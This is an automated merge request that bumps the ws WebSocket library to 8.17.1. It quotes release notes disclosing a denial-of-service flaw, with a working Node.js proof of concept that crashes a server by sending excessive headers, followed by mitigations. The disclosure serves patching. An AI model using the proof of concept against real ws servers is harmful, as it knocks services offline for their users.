chore(deps): update dependency ws to ^8.17.1
This MR contains the following updates:
Package | Type | Update | Change |
---|---|---|---|
ws | dependencies | patch | ^8.17.0 -> ^8.17.1 |
MR created with the help of gitlab-org/frontend/renovate-gitlab-bot
Release Notes
websockets/ws (ws)
v8.17.1
Bug fixes
- Fixed a DoS vulnerability (#2231).
A request with a number of headers exceeding the[server.maxHeadersCount
][server.maxHeadersCount]
threshold could be used to crash a ws server.
const http = require('http');
const WebSocket = require('ws');
const server = http.createServer();
const wss = new WebSocket.Server({ server });
server.listen(function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j < chars.length; j++) {
const key = chars[i] + chars[j];
headers[key] = 'x';
if (++count === 2000) break;
}
}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: server.address().port
});
request.end();
});
The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.
In vulnerable versions of ws, the issue can be mitigated in the following ways:
- Reduce the maximum allowed length of the request headers using the
[
--max-http-header-size=size
][--max-http-header-size=size] and/or the [maxHeaderSize
][maxHeaderSize] options so that no more headers than theserver.maxHeadersCount
limit can be sent. - Set
server.maxHeadersCount
to0
so that no limit is applied.
Configuration
-
If you want to rebase/retry this MR, check this box
This MR has been generated by Renovate Bot.